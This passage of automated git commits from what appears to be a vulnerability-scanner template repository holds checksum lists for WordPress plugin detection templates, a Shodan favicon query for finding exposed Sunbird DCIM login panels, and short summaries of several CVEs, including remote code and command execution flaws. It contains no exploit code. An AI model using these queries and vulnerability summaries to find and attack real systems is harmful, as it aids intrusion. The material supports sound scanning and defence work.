+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf -http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c +http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d +http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 +http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e +http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 +http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 +http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 +http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 +http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 +http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd +http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 +http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da +http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd +http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 -http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 -http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 +http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6575,7 +6576,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:2f8800bd2c70be367ddf890e7714a4bd14493311 +templates-checksum.txt:aa4a5683888622d7b8721de394b1850232066fef wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 5a1a729d19abe4e4007d9bb11a96ec085db78739 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 17:35:10 +0000 Subject: [PATCH 537/609] TemplateMan Update [Sat Jul 8 17:35:10 UTC 2023] :robot: --- http/exposed-panels/sunbird-dcim-panel.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposed-panels/sunbird-dcim-panel.yaml b/http/exposed-panels/sunbird-dcim-panel.yaml index adf5753d36..caa350975f 100644 --- a/http/exposed-panels/sunbird-dcim-panel.yaml +++ b/http/exposed-panels/sunbird-dcim-panel.yaml @@ -7,10 +7,9 @@ info: description: Sunbird DCIM login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 1 + max-request: 2 shodan-query: http.favicon.hash:781922099 verified: true tags: sunbird,panel,login From 558c5b29a1b077a34b448d61c7049ee44d9eca83 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 19:15:03 +0000 Subject: [PATCH 538/609] Auto Generated New Template Addition List [Sat Jul 8 19:15:03 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 298f4e170f..8ba664e8f6 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +http/cves/2022/CVE-2022-46073.yaml http/exposed-panels/sunbird-dcim-panel.yaml From 922c30a01a4b2c23dd4a2b80a2eeca18c882b083 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 19:15:17 +0000 Subject: [PATCH 539/609] Auto Generated cves.json [Sat Jul 8 19:15:17 UTC 2023] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 758069cf20..136e232f8b 100644 --- a/cves.json +++ b/cves.json @@ -1791,6 +1791,7 @@ {"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning \u003c7.16 - Open Redirect","Severity":"medium","Description":"ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45917.yaml"} {"ID":"CVE-2022-45933","Info":{"Name":"KubeView \u003c=0.1.31 - Information Disclosure","Severity":"critical","Description":"KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45933.yaml"} {"ID":"CVE-2022-46020","Info":{"Name":"WBCE CMS v1.5.4 - Remote Code Execution","Severity":"critical","Description":"WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46020.yaml"} +{"ID":"CVE-2022-46073","Info":{"Name":"Helmet Store Showroom - Cross Site Scripting","Severity":"medium","Description":"Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46073.yaml"} {"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c=1.2.22 - Remote Command Injection","Severity":"critical","Description":"Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected 